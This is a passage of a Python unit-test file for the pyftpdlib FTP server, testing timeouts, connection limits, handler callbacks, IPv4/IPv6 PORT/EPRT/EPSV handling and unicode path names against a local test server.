self.client.quit() # needed to fix occasional failures
with open(TESTFN, 'rb') as file:
file_data = file.read()
self.assertEqual(len(data), len(file_data))
self.assertEqual(hash(data), hash(file_data))
class TestTimeouts(unittest.TestCase):
"""Test idle-timeout capabilities of control and data channels.
Some tests may fail on slow machines.
"""
server_class = FTPd
client_class = ftplib.FTP
def setUp(self):
self.server = None
self.client = None
def _setUp(self, idle_timeout=300, data_timeout=300, pasv_timeout=30,
port_timeout=30):
self.server = self.server_class()
self.server.handler.timeout = idle_timeout
self.server.handler.dtp_handler.timeout = data_timeout
self.server.handler.passive_dtp.timeout = pasv_timeout
self.server.handler.active_dtp.timeout = port_timeout
self.server.start()
self.client = self.client_class(timeout=TIMEOUT)
self.client.connect(self.server.host, self.server.port)
self.client.login(USER, PASSWD)
def tearDown(self):
if self.client is not None and self.server is not None:
self.client.close()
self.server.handler.timeout = 300
self.server.handler.dtp_handler.timeout = 300
self.server.handler.passive_dtp.timeout = 30
self.server.handler.active_dtp.timeout = 30
self.server.stop()
def test_idle_timeout(self):
# Test control channel timeout. The client which does not send
# any command within the time specified in FTPHandler.timeout is
# supposed to be kicked off.
self._setUp(idle_timeout=0.1)
# fail if no msg is received within 1 second
self.client.sock.settimeout(1)
data = self.client.sock.recv(BUFSIZE)
self.assertEqual(data, b"421 Control connection timed out.\r\n")
# ensure client has been kicked off
self.assertRaises((socket.error, EOFError), self.client.sendcmd,
'noop')
def test_data_timeout(self):
# Test data channel timeout. The client which does not send
# or receive any data within the time specified in
# DTPHandler.timeout is supposed to be kicked off.
self._setUp(data_timeout=0.1)
addr = self.client.makepasv()
with contextlib.closing(socket.socket()) as s:
s.settimeout(TIMEOUT)
s.connect(addr)
# fail if no msg is received within 1 second
self.client.sock.settimeout(1)
data = self.client.sock.recv(BUFSIZE)
self.assertEqual(data, b"421 Data connection timed out.\r\n")
# ensure client has been kicked off
self.assertRaises((socket.error, EOFError), self.client.sendcmd,
'noop')
def test_data_timeout_not_reached(self):
# Impose a timeout for the data channel, then keep sending data for a
# time which is longer than that to make sure that the code checking
# whether the transfer stalled for with no progress is executed.
self._setUp(data_timeout=0.1)
with contextlib.closing(
self.client.transfercmd('stor ' + TESTFN)) as sock:
if hasattr(self.client_class, 'ssl_version'):
sock = ssl.wrap_socket(sock)
try:
stop_at = time.time() + 0.2
while time.time() < stop_at:
sock.send(b'x' * 1024)
sock.close()
self.client.voidresp()
finally:
if os.path.exists(TESTFN):
self.client.delete(TESTFN)
def test_idle_data_timeout1(self):
# Tests that the control connection timeout is suspended while
# the data channel is opened
self._setUp(idle_timeout=0.1, data_timeout=0.2)
addr = self.client.makepasv()
with contextlib.closing(socket.socket()) as s:
s.settimeout(TIMEOUT)
s.connect(addr)
# fail if no msg is received within 1 second
self.client.sock.settimeout(1)
data = self.client.sock.recv(BUFSIZE)
self.assertEqual(data, b"421 Data connection timed out.\r\n")
# ensure client has been kicked off
self.assertRaises((socket.error, EOFError), self.client.sendcmd,
'noop')
def test_idle_data_timeout2(self):
# Tests that the control connection timeout is restarted after
# data channel has been closed
self._setUp(idle_timeout=0.1, data_timeout=0.2)
addr = self.client.makepasv()
with contextlib.closing(socket.socket()) as s:
s.settimeout(TIMEOUT)
s.connect(addr)
# close data channel
self.client.sendcmd('abor')
self.client.sock.settimeout(1)
data = self.client.sock.recv(BUFSIZE)
self.assertEqual(data, b"421 Control connection timed out.\r\n")
# ensure client has been kicked off
self.assertRaises((socket.error, EOFError), self.client.sendcmd,
'noop')
def test_pasv_timeout(self):
# Test pasv data channel timeout. The client which does not
# connect to the listening data socket within the time specified
# in PassiveDTP.timeout is supposed to receive a 421 response.
self._setUp(pasv_timeout=0.1)
self.client.makepasv()
# fail if no msg is received within 1 second
self.client.sock.settimeout(1)
data = self.client.sock.recv(BUFSIZE)
self.assertEqual(data, b"421 Passive data channel timed out.\r\n")
# client is not expected to be kicked off
self.client.sendcmd('noop')
def test_disabled_idle_timeout(self):
self._setUp(idle_timeout=0)
self.client.sendcmd('noop')
def test_disabled_data_timeout(self):
self._setUp(data_timeout=0)
addr = self.client.makepasv()
with contextlib.closing(socket.socket()) as s:
s.settimeout(TIMEOUT)
s.connect(addr)
def test_disabled_pasv_timeout(self):
self._setUp(pasv_timeout=0)
self.client.makepasv()
# reset passive socket
addr = self.client.makepasv()
with contextlib.closing(socket.socket()) as s:
s.settimeout(TIMEOUT)
s.connect(addr)
def test_disabled_port_timeout(self):
self._setUp(port_timeout=0)
with contextlib.closing(self.client.makeport()):
with contextlib.closing(self.client.makeport()):
pass
class TestConfigurableOptions(unittest.TestCase):
"""Test those daemon options which are commonly modified by user."""
server_class = FTPd
client_class = ftplib.FTP
def setUp(self):
touch(TESTFN)
self.server = self.server_class()
self.server.start()
self.client = self.client_class(timeout=TIMEOUT)
self.client.connect(self.server.host, self.server.port)
self.client.login(USER, PASSWD)
def tearDown(self):
os.remove(TESTFN)
# set back options to their original value
self.server.server.max_cons = 0
self.server.server.max_cons_per_ip = 0
self.server.handler.banner = "pyftpdlib ready."
self.server.handler.max_login_attempts = 3
self.server.handler.auth_failed_timeout = 5
self.server.handler.masquerade_address = None
self.server.handler.masquerade_address_map = {}
self.server.handler.permit_privileged_ports = False
self.server.handler.passive_ports = None
self.server.handler.use_gmt_times = True
self.server.handler.tcp_no_delay = hasattr(socket, 'TCP_NODELAY')
self.server.stop()
self.client.close()
@disable_log_warning
def test_max_connections(self):
# Test FTPServer.max_cons attribute
self.server.server.max_cons = 3
self.client.quit()
c1 = self.client_class()
c2 = self.client_class()
c3 = self.client_class()
try:
c1.connect(self.server.host, self.server.port)
c2.connect(self.server.host, self.server.port)
self.assertRaises(ftplib.error_temp, c3.connect, self.server.host,
self.server.port)
# with passive data channel established
c2.quit()
c1.login(USER, PASSWD)
c1.makepasv()
self.assertRaises(ftplib.error_temp, c2.connect, self.server.host,
self.server.port)
# with passive data socket waiting for connection
c1.login(USER, PASSWD)
c1.sendcmd('pasv')
self.assertRaises(ftplib.error_temp, c2.connect, self.server.host,
self.server.port)
# with active data channel established
c1.login(USER, PASSWD)
with contextlib.closing(c1.makeport()):
self.assertRaises(
ftplib.error_temp, c2.connect, self.server.host,
self.server.port)
finally:
for c in (c1, c2, c3):
try:
c.quit()
except (socket.error, EOFError): # already disconnected
c.close()
@disable_log_warning
def test_max_connections_per_ip(self):
# Test FTPServer.max_cons_per_ip attribute
self.server.server.max_cons_per_ip = 3
self.client.quit()
c1 = self.client_class()
c2 = self.client_class()
c3 = self.client_class()
c4 = self.client_class()
try:
c1.connect(self.server.host, self.server.port)
c2.connect(self.server.host, self.server.port)
c3.connect(self.server.host, self.server.port)
self.assertRaises(ftplib.error_temp, c4.connect, self.server.host,
self.server.port)
# Make sure client has been disconnected.
# socket.error (Windows) or EOFError (Linux) exception is
# supposed to be raised in such a case.
self.assertRaises((socket.error, EOFError), c4.sendcmd, 'noop')
finally:
for c in (c1, c2, c3, c4):
try:
c.quit()
except (socket.error, EOFError): # already disconnected
c.close()
def test_banner(self):
# Test FTPHandler.banner attribute
self.server.handler.banner = 'hello there'
self.client.close()
self.client = self.client_class(timeout=TIMEOUT)
self.client.connect(self.server.host, self.server.port)
self.assertEqual(self.client.getwelcome()[4:], 'hello there')
def test_max_login_attempts(self):
# Test FTPHandler.max_login_attempts attribute.
self.server.handler.max_login_attempts = 1
self.server.handler.auth_failed_timeout = 0
self.assertRaises(ftplib.error_perm, self.client.login, 'wrong',
'wrong')
# socket.error (Windows) or EOFError (Linux) exceptions are
# supposed to be raised when attempting to send/recv some data
# using a disconnected socket
self.assertRaises((socket.error, EOFError), self.client.sendcmd,
'noop')
def test_masquerade_address(self):
# Test FTPHandler.masquerade_address attribute
host, port = self.client.makepasv()
self.assertEqual(host, self.server.host)
self.server.handler.masquerade_address = "256.256.256.256"
host, port = self.client.makepasv()
self.assertEqual(host, "256.256.256.256")
def test_masquerade_address_map(self):
# Test FTPHandler.masquerade_address_map attribute
host, port = self.client.makepasv()
self.assertEqual(host, self.server.host)
self.server.handler.masquerade_address_map = {self.server.host:
"128.128.128.128"}
host, port = self.client.makepasv()
self.assertEqual(host, "128.128.128.128")
def test_passive_ports(self):
# Test FTPHandler.passive_ports attribute
_range = list(range(40000, 60000, 200))
self.server.handler.passive_ports = _range
self.assertTrue(self.client.makepasv()[1] in _range)
self.assertTrue(self.client.makepasv()[1] in _range)
self.assertTrue(self.client.makepasv()[1] in _range)
self.assertTrue(self.client.makepasv()[1] in _range)
@disable_log_warning
def test_passive_ports_busy(self):
# If the ports in the configured range are busy it is expected
# that a kernel-assigned port gets chosen
with contextlib.closing(socket.socket()) as s:
s.settimeout(TIMEOUT)
s.bind((HOST, 0))
port = s.getsockname()[1]
self.server.handler.passive_ports = [port]
resulting_port = self.client.makepasv()[1]
self.assertTrue(port != resulting_port)
@disable_log_warning
def test_permit_privileged_ports(self):
# Test FTPHandler.permit_privileged_ports_active attribute
# try to bind a socket on a privileged port
sock = None
for port in reversed(range(1, 1024)):
try:
socket.getservbyport(port)
except socket.error:
# not registered port; go on
try:
sock = socket.socket(self.client.af, socket.SOCK_STREAM)
sock.settimeout(TIMEOUT)
sock.bind((HOST, port))
break
except socket.error as err:
if err.errno == errno.EACCES:
# root privileges needed
if sock is not None:
sock.close()
sock = None
break
sock.close()
continue
else:
# registered port found; skip to the next one
continue
else:
# no usable privileged port was found
sock = None
self.addCleanup(sock.close)
self.server.handler.permit_privileged_ports = False
self.assertRaises(ftplib.error_perm, self.client.sendport, HOST,
port)
if sock:
port = sock.getsockname()[1]
self.server.handler.permit_privileged_ports = True
sock.listen(5)
sock.settimeout(TIMEOUT)
self.client.sendport(HOST, port)
s, addr = sock.accept()
s.close()
def test_use_gmt_times(self):
# use GMT time
self.server.handler.use_gmt_times = True
gmt1 = self.client.sendcmd('mdtm ' + TESTFN)
gmt2 = self.client.sendcmd('mlst ' + TESTFN)
gmt3 = self.client.sendcmd('stat ' + TESTFN)
# use local time
self.server.handler.use_gmt_times = False
self.client.quit()
self.client.connect(self.server.host, self.server.port)
self.client.login(USER, PASSWD)
loc1 = self.client.sendcmd('mdtm ' + TESTFN)
loc2 = self.client.sendcmd('mlst ' + TESTFN)
loc3 = self.client.sendcmd('stat ' + TESTFN)
# if we're not in a GMT time zone times are supposed to be
# different
if time.timezone != 0:
self.assertNotEqual(gmt1, loc1)
self.assertNotEqual(gmt2, loc2)
self.assertNotEqual(gmt3, loc3)
# ...otherwise they should be the same
else:
self.assertEqual(gmt1, loc1)
self.assertEqual(gmt2, loc2)
self.assertEqual(gmt3, loc3)
@unittest.skipUnless(hasattr(socket, 'TCP_NODELAY'),
'TCP_NODELAY not available')
def test_tcp_no_delay(self):
def get_handler_socket():
# return the server's handler socket object
ioloop = IOLoop.instance()
for fd in ioloop.socket_map:
instance = ioloop.socket_map[fd]
if isinstance(instance, FTPHandler):
break
return instance.socket
s = get_handler_socket()
self.assertTrue(s.getsockopt(socket.SOL_TCP, socket.TCP_NODELAY))
self.client.quit()
self.server.handler.tcp_no_delay = False
self.client.connect(self.server.host, self.server.port)
self.client.sendcmd('noop')
s = get_handler_socket()
self.assertFalse(s.getsockopt(socket.SOL_TCP, socket.TCP_NODELAY))
class TestCallbacks(unittest.TestCase):
"""Test FTPHandler class callback methods."""
server_class = FTPd
client_class = ftplib.FTP
def setUp(self):
self.client = None
self.server = None
self.file = None
self.dummyfile = None
def _setUp(self, handler, connect=True, login=True):
self.tearDown()
FTPd.handler = handler
self.server = self.server_class()
self.server.start()
self.client = self.client_class(timeout=TIMEOUT)
if connect:
self.client.connect(self.server.host, self.server.port)
if login:
self.client.login(USER, PASSWD)
self.file = open(TESTFN, 'w+b')
self.dummyfile = BytesIO()
self._tearDown = False
def tearDown(self):
if self.client is not None:
self.client.close()
if self.server is not None and self.server.running:
self.server.stop()
if self.file is not None:
self.file.close()
if self.dummyfile is not None:
self.dummyfile.close()
safe_remove(TESTFN)
def test_on_file_sent(self):
_file = []
class TestHandler(FTPHandler):
def on_file_sent(self, file):
_file.append(file)
self._setUp(TestHandler)
data = b'abcde12345' * 100000
self.file.write(data)
self.file.close()
self.client.retrbinary("retr " + TESTFN, lambda x: x)
# shut down the server to avoid race conditions
self.tearDown()
self.assertEqual(_file, [os.path.abspath(TESTFN)])
def test_on_file_received(self):
_file = []
class TestHandler(FTPHandler):
def on_file_received(self, file):
_file.append(file)
self._setUp(TestHandler)
data = b'abcde12345' * 100000
self.dummyfile.write(data)
self.dummyfile.seek(0)
self.client.storbinary('stor ' + TESTFN, self.dummyfile)
# shut down the server to avoid race conditions
self.tearDown()
self.assertEqual(_file, [os.path.abspath(TESTFN)])
@retry_before_failing()
def test_on_incomplete_file_sent(self):
_file = []
class TestHandler(FTPHandler):
def on_incomplete_file_sent(self, file):
_file.append(file)
self._setUp(TestHandler)
data = b'abcde12345' * 100000
self.file.write(data)
self.file.close()
bytes_recv = 0
with contextlib.closing(
self.client.transfercmd("retr " + TESTFN, None)) as conn:
while 1:
chunk = conn.recv(BUFSIZE)
bytes_recv += len(chunk)
if bytes_recv >= INTERRUPTED_TRANSF_SIZE or not chunk:
break
self.assertEqual(self.client.getline()[:3], "426")
# shut down the server to avoid race conditions
self.tearDown()
self.assertEqual(_file, [os.path.abspath(TESTFN)])
@unittest.skipIf(TRAVIS, "failing on Travis")
@retry_before_failing()
def test_on_incomplete_file_received(self):
_file = []
class TestHandler(FTPHandler):
def on_incomplete_file_received(self, file):
_file.append(file)
self._setUp(TestHandler)
data = b'abcde12345' * 100000
self.dummyfile.write(data)
self.dummyfile.seek(0)
with contextlib.closing(
self.client.transfercmd('stor ' + TESTFN)) as conn:
bytes_sent = 0
while 1:
chunk = self.dummyfile.read(BUFSIZE)
conn.sendall(chunk)
bytes_sent += len(chunk)
# stop transfer while it isn't finished yet
if bytes_sent >= INTERRUPTED_TRANSF_SIZE or not chunk:
self.client.putcmd('abor')
break
self.assertRaises(ftplib.error_temp, self.client.getresp) # 426
# shut down the server to avoid race conditions
self.tearDown()
self.assertEqual(_file, [os.path.abspath(TESTFN)])
def test_on_connect(self):
flag = []
class TestHandler(FTPHandler):
def on_connect(self):
flag.append(None)
self._setUp(TestHandler, connect=False)
self.client.connect(self.server.host, self.server.port)
self.client.sendcmd('noop')
self.assertTrue(flag)
def test_on_disconnect(self):
flag = []
class TestHandler(FTPHandler):
def on_disconnect(self):
flag.append(None)
self._setUp(TestHandler, connect=False)
self.client.connect(self.server.host, self.server.port)
self.assertFalse(flag)
self.client.sendcmd('quit')
try:
self.client.sendcmd('noop')
except (socket.error, EOFError):
pass
else:
self.fail('still connected')
self.tearDown()
self.assertTrue(flag)
def test_on_login(self):
user = []
class TestHandler(FTPHandler):
auth_failed_timeout = 0
def on_login(self, username):
user.append(username)
self._setUp(TestHandler)
# shut down the server to avoid race conditions
self.tearDown()
self.assertEqual(user, [USER])
def test_on_login_failed(self):
pair = []
class TestHandler(FTPHandler):
auth_failed_timeout = 0
def on_login_failed(self, username, password):
pair.append((username, password))
self._setUp(TestHandler, login=False)
self.assertRaises(ftplib.error_perm, self.client.login, 'foo', 'bar')
# shut down the server to avoid race conditions
self.tearDown()
self.assertEqual(pair, [('foo', 'bar')])
def test_on_logout_quit(self):
user = []
class TestHandler(FTPHandler):
def on_logout(self, username):
user.append(username)
self._setUp(TestHandler)
self.client.quit()
# shut down the server to avoid race conditions
self.tearDown()
self.assertEqual(user, [USER])
def test_on_logout_rein(self):
user = []
class TestHandler(FTPHandler):
def on_logout(self, username):
user.append(username)
self._setUp(TestHandler)
self.client.sendcmd('rein')
# shut down the server to avoid race conditions
self.tearDown()
self.assertEqual(user, [USER])
def test_on_logout_user_issued_twice(self):
users = []
class TestHandler(FTPHandler):
def on_logout(self, username):
users.append(username)
self._setUp(TestHandler)
# At this point user "user" is logged in. Re-login as anonymous,
# then quit and expect queue == ["user", "anonymous"]
self.client.login("anonymous")
self.client.quit()
# shut down the server to avoid race conditions
self.tearDown()
self.assertEqual(users, [USER, 'anonymous'])
def test_on_logout_no_pass(self):
# make sure on_logout() is not called if USER was provided
# but not PASS
users = []
class TestHandler(FTPHandler):
def on_logout(self, username):
users.append(username)
self._setUp(TestHandler, login=False)
self.client.sendcmd("user foo")
self.client.quit()
# shut down the server to avoid race conditions
self.tearDown()
self.assertEqual(users, [])
class _TestNetworkProtocols(object):
"""Test PASV, EPSV, PORT and EPRT commands.
Do not use this class directly, let TestIPv4Environment and
TestIPv6Environment classes use it instead.
"""
server_class = FTPd
client_class = ftplib.FTP
HOST = HOST
def setUp(self):
self.server = self.server_class((self.HOST, 0))
self.server.start()
self.client = self.client_class(timeout=TIMEOUT)
self.client.connect(self.server.host, self.server.port)
self.client.login(USER, PASSWD)
if self.client.af == socket.AF_INET:
self.proto = "1"
self.other_proto = "2"
else:
self.proto = "2"
self.other_proto = "1"
def tearDown(self):
self.client.close()
self.server.stop()
def cmdresp(self, cmd):
"""Send a command and return response, also if the command failed."""
try:
return self.client.sendcmd(cmd)
except ftplib.Error as err:
return str(err)
@disable_log_warning
def test_eprt(self):
if not SUPPORTS_HYBRID_IPV6:
# test wrong proto
try:
self.client.sendcmd('eprt |%s|%s|%s|' % (self.other_proto,
self.server.host, self.server.port))
except ftplib.error_perm as err:
self.assertEqual(str(err)[0:3], "522")
else:
self.fail("Exception not raised")
# test bad args
msg = "501 Invalid EPRT format."
# len('|') > 3
self.assertEqual(self.cmdresp('eprt ||||'), msg)
# len('|') < 3
self.assertEqual(self.cmdresp('eprt ||'), msg)
# port > 65535
self.assertEqual(self.cmdresp('eprt |%s|%s|65536|' % (self.proto,
self.HOST)), msg)
# port < 0
self.assertEqual(self.cmdresp('eprt |%s|%s|-1|' % (self.proto,
self.HOST)), msg)
# port < 1024
resp = self.cmdresp('eprt |%s|%s|222|' % (self.proto, self.HOST))
self.assertEqual(resp[:3], '501')
self.assertIn('privileged port', resp)
# proto > 2
_cmd = 'eprt |3|%s|%s|' % (self.server.host, self.server.port)
self.assertRaises(ftplib.error_perm, self.client.sendcmd, _cmd)
if self.proto == '1':
# len(ip.octs) > 4
self.assertEqual(self.cmdresp('eprt |1|1.2.3.4.5|2048|'), msg)
# ip.oct > 255
self.assertEqual(self.cmdresp('eprt |1|1.2.3.256|2048|'), msg)
# bad proto
resp = self.cmdresp('eprt |2|1.2.3.256|2048|')
self.assertTrue("Network protocol not supported" in resp)
# test connection
with contextlib.closing(socket.socket(self.client.af)) as sock:
sock.bind((self.client.sock.getsockname()[0], 0))
sock.listen(5)
sock.settimeout(TIMEOUT)
ip, port = sock.getsockname()[:2]
self.client.sendcmd('eprt |%s|%s|%s|' % (self.proto, ip, port))
try:
s = sock.accept()
s[0].close()
except socket.timeout:
self.fail("Server didn't connect to passive socket")
def test_epsv(self):
# test wrong proto
try:
self.client.sendcmd('epsv ' + self.other_proto)
except ftplib.error_perm as err:
self.assertEqual(str(err)[0:3], "522")
else:
self.fail("Exception not raised")
# proto > 2
self.assertRaises(ftplib.error_perm, self.client.sendcmd, 'epsv 3')
# test connection
for cmd in ('EPSV', 'EPSV ' + self.proto):
host, port = ftplib.parse229(self.client.sendcmd(cmd),
self.client.sock.getpeername())
with contextlib.closing(
socket.socket(self.client.af, socket.SOCK_STREAM)) as s:
s.settimeout(TIMEOUT)
s.connect((host, port))
self.client.sendcmd('abor')
def test_epsv_all(self):
self.client.sendcmd('epsv all')
self.assertRaises(ftplib.error_perm, self.client.sendcmd, 'pasv')
self.assertRaises(ftplib.error_perm, self.client.sendport, self.HOST,
2000)
self.assertRaises(ftplib.error_perm, self.client.sendcmd,
'eprt |%s|%s|%s|' % (self.proto, self.HOST, 2000))
@unittest.skipUnless(SUPPORTS_IPV4, "IPv4 not supported")
class TestIPv4Environment(_TestNetworkProtocols, unittest.TestCase):
"""Test PASV, EPSV, PORT and EPRT commands.
Runs tests contained in _TestNetworkProtocols class by using IPv4
plus some additional specific tests.
"""
server_class = FTPd
client_class = ftplib.FTP
HOST = '127.0.0.1'
@disable_log_warning
def test_port_v4(self):
# test connection
with contextlib.closing(self.client.makeport()):
self.client.sendcmd('abor')
# test bad arguments
ae = self.assertEqual
msg = "501 Invalid PORT format."
ae(self.cmdresp('port 127,0,0,1,1.1'), msg) # sep != ','
ae(self.cmdresp('port X,0,0,1,1,1'), msg) # value != int
ae(self.cmdresp('port 127,0,0,1,1,1,1'), msg) # len(args) > 6
ae(self.cmdresp('port 127,0,0,1'), msg) # len(args) < 6
ae(self.cmdresp('port 256,0,0,1,1,1'), msg) # oct > 255
ae(self.cmdresp('port 127,0,0,1,256,1'), msg) # port > 65535
ae(self.cmdresp('port 127,0,0,1,-1,0'), msg) # port < 0
# port < 1024
resp = self.cmdresp('port %s,1,1' % self.HOST.replace('.', ','))
self.assertEqual(resp[:3], '501')
self.assertIn('privileged port', resp)
if "1.2.3.4" != self.HOST:
resp = self.cmdresp('port 1,2,3,4,4,4')
assert 'foreign address' in resp, resp
@disable_log_warning
def test_eprt_v4(self):
resp = self.cmdresp('eprt |1|0.10.10.10|2222|')
self.assertEqual(resp[:3], '501')
self.assertIn('foreign address', resp)
def test_pasv_v4(self):
host, port = ftplib.parse227(self.client.sendcmd('pasv'))
with contextlib.closing(
socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
s.settimeout(TIMEOUT)
s.connect((host, port))
@unittest.skipUnless(SUPPORTS_IPV6, "IPv6 not supported")
class TestIPv6Environment(_TestNetworkProtocols, unittest.TestCase):
"""Test PASV, EPSV, PORT and EPRT commands.
Runs tests contained in _TestNetworkProtocols class by using IPv6
plus some additional specific tests.
"""
server_class = FTPd
client_class = ftplib.FTP
HOST = '::1'
def test_port_v6(self):
# PORT is not supposed to work
self.assertRaises(ftplib.error_perm, self.client.sendport,
self.server.host, self.server.port)
def test_pasv_v6(self):
# PASV is still supposed to work to support clients using
# IPv4 connecting to a server supporting both IPv4 and IPv6
self.client.makepasv()
@disable_log_warning
def test_eprt_v6(self):
resp = self.cmdresp('eprt |2|::foo|2222|')
self.assertEqual(resp[:3], '501')
self.assertIn('foreign address', resp)
@unittest.skipUnless(SUPPORTS_HYBRID_IPV6, "IPv4/6 dual stack not supported")
class TestIPv6MixedEnvironment(unittest.TestCase):
"""By running the server by specifying "::" as IP address the
server is supposed to listen on all interfaces, supporting both
IPv4 and IPv6 by using a single socket.
What we are going to do here is starting the server in this
manner and try to connect by using an IPv4 client.
"""
server_class = FTPd
client_class = ftplib.FTP
HOST = "::"
def setUp(self):
self.server = self.server_class((self.HOST, 0))
self.server.start()
self.client = None
def tearDown(self):
if self.client is not None:
self.client.close()
self.server.stop()
def test_port_v4(self):
def noop(x):
return x
self.client = self.client_class(timeout=TIMEOUT)
self.client.connect('127.0.0.1', self.server.port)
self.client.set_pasv(False)
self.client.login(USER, PASSWD)
self.client.retrlines('list', noop)
def test_pasv_v4(self):
def noop(x):
return x
self.client = self.client_class(timeout=TIMEOUT)
self.client.connect('127.0.0.1', self.server.port)
self.client.set_pasv(True)
self.client.login(USER, PASSWD)
self.client.retrlines('list', noop)
# make sure pasv response doesn't return an IPv4-mapped address
ip = self.client.makepasv()[0]
self.assertFalse(ip.startswith("::ffff:"))
def test_eprt_v4(self):
self.client = self.client_class(timeout=TIMEOUT)
self.client.connect('127.0.0.1', self.server.port)
self.client.login(USER, PASSWD)
# test connection
with contextlib.closing(
socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as sock:
sock.bind((self.client.sock.getsockname()[0], 0))
sock.listen(5)
sock.settimeout(2)
ip, port = sock.getsockname()[:2]
self.client.sendcmd('eprt |1|%s|%s|' % (ip, port))
try:
sock2, addr = sock.accept()
sock2.close()
except socket.timeout:
self.fail("Server didn't connect to passive socket")
def test_epsv_v4(self):
def mlstline(cmd):
return self.client.voidcmd(cmd).split('\n')[1]
self.client = self.client_class(timeout=TIMEOUT)
self.client.connect('127.0.0.1', self.server.port)
self.client.login(USER, PASSWD)
host, port = ftplib.parse229(self.client.sendcmd('EPSV'),
self.client.sock.getpeername())
self.assertEqual('127.0.0.1', host)
with contextlib.closing(
socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
s.settimeout(TIMEOUT)
s.connect((host, port))
self.assertTrue(mlstline('mlst /').endswith('/'))
class TestCornerCases(unittest.TestCase):
"""Tests for any kind of strange situation for the server to be in,
mainly referring to bugs signaled on the bug tracker.
"""
server_class = FTPd
client_class = ftplib.FTP
def setUp(self):
self.server = self.server_class()
self.server.start()
self.client = self.client_class(timeout=TIMEOUT)
self.client.connect(self.server.host, self.server.port)
self.client.login(USER, PASSWD)
def tearDown(self):
self.client.close()
if self.server.running:
self.server.stop()
def test_port_race_condition(self):
# Refers to bug #120, first sends PORT, then disconnects the
# control channel before accept()ing the incoming data connection.
# The original server behavior was to reply with "200 Active
# data connection established" *after* the client had already
# disconnected the control connection.
with contextlib.closing(socket.socket(self.client.af)) as sock:
sock.bind((self.client.sock.getsockname()[0], 0))
sock.listen(5)
sock.settimeout(TIMEOUT)
host, port = sock.getsockname()[:2]
hbytes = host.split('.')
pbytes = [repr(port // 256), repr(port % 256)]
bytes = hbytes + pbytes
cmd = 'PORT ' + ','.join(bytes) + '\r\n'
self.client.sock.sendall(b(cmd))
self.client.quit()
s, addr = sock.accept()
s.close()
def test_stou_max_tries(self):
# Emulates case where the max number of tries to find out a
# unique file name when processing STOU command gets hit.
class TestFS(AbstractedFS):
def mkstemp(self, *args, **kwargs):
raise IOError(errno.EEXIST,
"No usable temporary file name found")
self.server.handler.abstracted_fs = TestFS
try:
self.client.quit()
self.client.connect(self.server.host, self.server.port)
self.client.login(USER, PASSWD)
self.assertRaises(ftplib.error_temp, self.client.sendcmd, 'stou')
finally:
self.server.handler.abstracted_fs = AbstractedFS
def test_quick_connect(self):
# Clients that connected and disconnected quickly could cause
# the server to crash, due to a failure to catch errors in the
# initial part of the connection process.
# Tracked in issues #91, #104 and #105.
# See also https://bugs.launchpad.net/zodb/+bug/135108
import struct
def connect(addr):
with contextlib.closing(socket.socket()) as s:
# Set SO_LINGER to 1,0 causes a connection reset (RST) to
# be sent when close() is called, instead of the standard
# FIN shutdown sequence.
s.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER,
struct.pack('ii', 1, 0))
s.settimeout(TIMEOUT)
try:
s.connect(addr)
except socket.error:
pass
for x in range(10):
connect((self.server.host, self.server.port))
for x in range(10):
addr = self.client.makepasv()
connect(addr)
def test_error_on_callback(self):
# test that the server do not crash in case an error occurs
# while firing a scheduled function
self.tearDown()
server = FTPServer((HOST, 0), FTPHandler)
self.addCleanup(server.close)
logger = logging.getLogger('pyftpdlib')
logger.disabled = True
try:
len1 = len(IOLoop.instance().socket_map)
IOLoop.instance().call_later(0, lambda: 1 // 0)
server.serve_forever(timeout=0.001, blocking=False)
len2 = len(IOLoop.instance().socket_map)
self.assertEqual(len1, len2)
finally:
logger.disabled = False
def test_active_conn_error(self):
# we open a socket() but avoid to invoke accept() to
# reproduce this error condition:
# http://code.google.com/p/pyftpdlib/source/detail?r=905
with contextlib.closing(socket.socket()) as sock:
sock.bind((HOST, 0))
port = sock.getsockname()[1]
self.client.sock.settimeout(.1)
try:
resp = self.client.sendport(HOST, port)
except ftplib.error_temp as err:
self.assertEqual(str(err)[:3], '425')
except (socket.timeout, getattr(ssl, "SSLError", object())):
pass
else:
self.assertNotEqual(str(resp)[:3], '200')
def test_repr(self):
# make sure the FTP/DTP handler classes have a sane repr()
with contextlib.closing(self.client.makeport()):
for inst in IOLoop.instance().socket_map.values():
repr(inst)
str(inst)
if hasattr(os, 'sendfile'):
def test_sendfile(self):
# make sure that on python >= 3.3 we're using os.sendfile
# rather than third party pysendfile module
from pyftpdlib.handlers import sendfile
self.assertIs(sendfile, os.sendfile)
if SUPPORTS_SENDFILE:
def test_sendfile_enabled(self):
self.assertEqual(FTPHandler.use_sendfile, True)
if hasattr(select, 'epoll') or hasattr(select, 'kqueue'):
def test_ioloop_fileno(self):
fd = self.server.server.ioloop.fileno()
self.assertTrue(isinstance(fd, int), fd)
# TODO: disabled as on certain platforms (OSX and Windows)
# produces failures with python3. Will have to get back to
# this and fix it.
@unittest.skipIf(OSX or WINDOWS, "fails on OSX or Windows")
class TestUnicodePathNames(unittest.TestCase):
"""Test FTP commands and responses by using path names with non
ASCII characters.
"""
server_class = FTPd
client_class = ftplib.FTP
def setUp(self):
self.server = self.server_class()
self.server.start()
self.client = self.client_class(timeout=TIMEOUT)
self.client.encoding = 'utf8' # PY3 only
self.client.connect(self.server.host, self.server.port)
self.client.login(USER, PASSWD)
if PY3:
safe_mkdir(bytes(TESTFN_UNICODE, 'utf8'))
touch(bytes(TESTFN_UNICODE_2, 'utf8'))
self.utf8fs = TESTFN_UNICODE in os.listdir('.')
else:
warnings.filterwarnings("ignore")
safe_mkdir(TESTFN_UNICODE)
touch(TESTFN_UNICODE_2)
self.utf8fs = unicode(TESTFN_UNICODE, 'utf8') in os.listdir(u('.'))
warnings.resetwarnings()
def tearDown(self):
self.client.close()
self.server.stop()
remove_test_files()
# --- fs operations
def test_cwd(self):
if self.utf8fs:
resp = self.client.cwd(TESTFN_UNICODE)
self.assertTrue(TESTFN_UNICODE in resp)
else:
self.assertRaises(ftplib.error_perm, self.client.cwd,
TESTFN_UNICODE)
def test_mkd(self):
if self.utf8fs:
os.rmdir(TESTFN_UNICODE)
dirname = self.client.mkd(TESTFN_UNICODE)
self.assertEqual(dirname, '/' + TESTFN_UNICODE)
self.assertTrue(os.path.isdir(TESTFN_UNICODE))
else:
self.assertRaises(ftplib.error_perm, self.client.mkd,
TESTFN_UNICODE)
def test_rmdir(self):
if self.utf8fs:
self.client.rmd(TESTFN_UNICODE)
else:
